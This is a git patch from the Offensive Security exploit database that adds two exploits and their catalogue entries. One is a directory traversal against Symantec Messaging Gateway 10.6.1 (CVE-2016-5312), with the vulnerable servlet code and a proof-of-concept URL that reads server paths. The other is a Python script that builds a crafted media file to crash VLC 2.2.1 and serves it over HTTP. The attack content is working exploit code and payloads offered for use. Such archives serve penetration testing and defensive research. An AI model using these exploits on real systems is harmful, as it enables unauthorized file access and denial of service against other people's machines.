From d86bdf5f80de1a24bdf35ba5d99798494f7d0c9e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 29 Sep 2016 05:01:16 +0000 Subject: [PATCH] DB: 2016-09-29 2 new exploits Symantec Messaging Gateway 10.6.1 - Directory Traversal VLC Media Player 2.2.1 - Buffer Overflow --- files.csv | 2 ++ platforms/java/webapps/40437.txt | 53 ++++++++++++++++++++++++++++++++ platforms/windows/dos/40439.py | 38 +++++++++++++++++++++++ 3 files changed, 93 insertions(+) create mode 100755 platforms/java/webapps/40437.txt create mode 100755 platforms/windows/dos/40439.py diff --git a/files.csv b/files.csv index 8c4747e46..610ad63e8 100755 --- a/files.csv +++ b/files.csv @@ -35268,6 +35268,7 @@ id,file,description,date,author,platform,type,port 38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0 +40437,platforms/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,java,webapps,0 38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 @@ -36559,3 +36560,4 @@ id,file,description,date,author,platform,type,port 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0 40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0 +40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0 diff --git a/platforms/java/webapps/40437.txt b/platforms/java/webapps/40437.txt new file mode 100755 index 000000000..52db53e05 --- /dev/null +++ b/platforms/java/webapps/40437.txt @@ -0,0 +1,53 @@ +# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal +# Date : 28/09/2016 +# Author : R-73eN +# Tested on : Symantec Messaging Gateway 10.6.1 (Latest) +# Software : https://www.symantec.com/products/threat-protection/messaging-gateway +# Vendor : Symantec +# CVE : CVE-2016-5312 +# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00 +# +# ___ __ ____ _ _ +# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | +# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | +# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ +# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____| +# +# +# DESCRIPTION: +# +# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. +# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. +# This could potentially provide read access to some files/directories on the server for which the user is not authorized. +# +The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java +The vulnerable code is +extends HttpServlet { + public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) { + block6 : { + try { + String string = httpServletRequest.getParameter("sn"); + //**** Taking parameter "sn" and writing it to the "string variable" + + + if (string == null) break block6; + String string2 = string.substring(string.length() - 3); + + byte[] arrby = (byte[])this.getServletContext().getAttribute(string); + + //**** The string variable is passed here without any sanitanization for directory traversal + //**** and you can successfully use this to do a directory traversal. + + if (arrby != null) { + httpServletResponse.setContentType("image/" + string2); + ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream(); + httpServletResponse.setContentLength(arrby.length); + servletOutputStream.write(arrby); + this.getServletContext().removeAttribute(string); + break block6; + } + + +POC: +https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib + diff --git a/platforms/windows/dos/40439.py b/platforms/windows/dos/40439.py new file mode 100755 index 000000000..83ddebc46 --- /dev/null +++ b/platforms/windows/dos/40439.py @@ -0,0 +1,38 @@ +Exploit Title: VLC Media Player 2.2.1 Buffer Overflow +2016-09-28 +Author: sultan albalawi +Software Link: https://www.videolan.org/vlc/releases/2.2.1.html +Tested on:win7 +video :https://www.facebook.com/pentest3/videos/vb.100012552940568/189735791454851/?type=2&theater¬if_t=video_processed¬if_id=1475012468070044 + +************************************************************************************* +filecreate = "payload.wmv" # create file (payload.wmv) +buffer = ("\x23\x45\x58\x54\x4d\x33\x55\r\n\x23"+ +"\x45\x58\x54\x2d\x58\x2d\x53\x54\x52"+ +"\x45\x41\x4d\x2d\x49\x4e\x46\x3a\x50"+ +"\x52\x4f\x47\x52\x41\x4d\x2d\x49\x44"+ +"\x3d\x31\x2c\x42\x41\x4e\x44\x57\x49"+ +"\x44\x54\x48\x3d\x31\x2c\x52\x45\x53"+ +"\x4f\x4c\x55\x54\x49\x4f\x4e\x3d\x31"+ +"\x32\x30\x78\x33\x36\x30\r\n") +buffer += filecreate +open(filecreate, "wb").write(buffer) +print "create file done {}".format(filecreate) +import BaseHTTPServer +import sys +from SimpleHTTPServer import SimpleHTTPRequestHandler +HandlerClass = SimpleHTTPRequestHandler +ServerClass = BaseHTTPServer.HTTPServer +Protocol = "HTTP/1.0" +if sys.argv[1:]: + port = int(sys.argv[1]) +else: + port =8080 +server_address = ('192.168.100.3',8080) +HandlerClass.protocol_version = Protocol +httpd = ServerClass(server_address, HandlerClass) +sa = httpd.socket.getsockname() +print sa[0],sa[1],filecreate +print "open vlc and open file {}".format(filecreate) +print "LISTENING..",sa[0],sa[1],filecreate +httpd.serve_forever()